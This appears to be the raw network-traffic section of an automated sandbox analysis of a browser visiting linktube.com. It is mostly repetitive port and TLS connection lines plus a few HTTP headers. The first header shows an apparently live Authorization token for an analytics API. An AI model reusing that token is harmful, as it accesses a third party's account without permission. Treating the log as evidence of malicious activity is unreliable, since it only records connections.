Source: unknownHTTP traffic detected: POST /sdk/get_info HTTP/1.1Host: api.factors.aiConnection: keep-aliveContent-Length: 2sec-ch-ua-platform: "Windows"Authorization: xmjlrcsgnhckg6yc26m86c0g53jjquhcUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/jsonsec-ch-ua-mobile: ?0Accept: */*Origin: https://linktube.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainX-Req-Id: cvi5mrklohac73cmlrkgDate: Wed, 26 Mar 2025 19:54:22 GMTContent-Length: 18Via: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainX-Req-Id: cvi5mrn7i51c738hdhjgDate: Wed, 26 Mar 2025 19:54:22 GMTContent-Length: 18Via: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 53Access-Control-Allow-Origin: *Access-Control-Expose-Headers: *Timing-Allow-Origin: *Cache-Control: public, max-age=600, s-maxage=600Cross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadContent-Type: text/plain; charset=utf-8ETag: W/"35-Su9w8wyWNKnBnB1glhnyKiBNAH4"Accept-Ranges: bytesAge: 0Date: Wed, 26 Mar 2025 19:54:31 GMTX-Served-By: cache-fra-etou8220171-FRA, cache-nyc-kteb1890071-NYCX-Cache: MISS, MISSVary: Accept-Encodingalt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 19:54:36 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://apressa.com.br/wp-json/>; rel="https://api.w.org/"Cache-Control: s-maxage=2592000Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainX-Req-Id: cvi5naotfb7c739i41g0Date: Wed, 26 Mar 2025 19:55:23 GMTContent-Length: 18Via: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainX-Req-Id: cvi5nb7lngps73c9slk0Date: Wed, 26 Mar 2025 19:55:24 GMTContent-Length: 18Via: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 213.186.33.16:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.186.33.16:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.186.33.16:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.248.230.249:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.248.230.249:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.248.230.249:443 -> 192.168.2.16:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.164.96.16:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.195:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.248.230.249:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.160.69.120:443 -> 192.168.2.16:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.1:443 -> 192.168.2.16:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.160.69.120:443 -> 192.168.2.16:49752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.65.228:443 -> 192.168.2.16:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49758 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49760 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.77.32:443 -> 192.168.2.16:49775 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.77.32:443 -> 192.168.2.16:49776 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49784 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.248.230.249:443 -> 192.168.2.16:49783 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49785 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49792 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49795 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49796 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49794 version: TLS 1.2
Source: unknownHTTPS traffic detected: 157.240.241.35:443 -> 192.168.2.16:49797 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.84.118:443 -> 192.168.2.16:49798 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49807 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.84.118:443 -> 192.168.2.16:49806 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49808 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49809 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49811 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.164.96.54:443 -> 192.168.2.16:49814 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.241.77.32:443 -> 192.168.2.16:49815 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.45.229:443 -> 192.168.2.16:49816 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.6.156:443 -> 192.168.2.16:49818 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.232.36.176:443 -> 192.168.2.16:49821 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.9.156:443 -> 192.168.2.16:49822 version: TLS 1.2
Source: unknownHTTPS traffic detected: 43.128.193.10:443 -> 192.168.2.16:49819 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.190.130:443 -> 192.168.2.16:49824 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.248.230.249:443 -> 192.168.2.16:49828 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.45.229:443 -> 192.168.2.16:49831 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.16:49832 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.200.22.172:443 -> 192.168.2.16:49833 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.203.153.105:443 -> 192.168.2.16:49835 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.49.17.168:443 -> 192.168.2.16:49837 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.16:49839 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.186.33.16:443 -> 192.168.2.16:49849 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.186.33.16:443 -> 192.168.2.16:49850 version: TLS 1.2
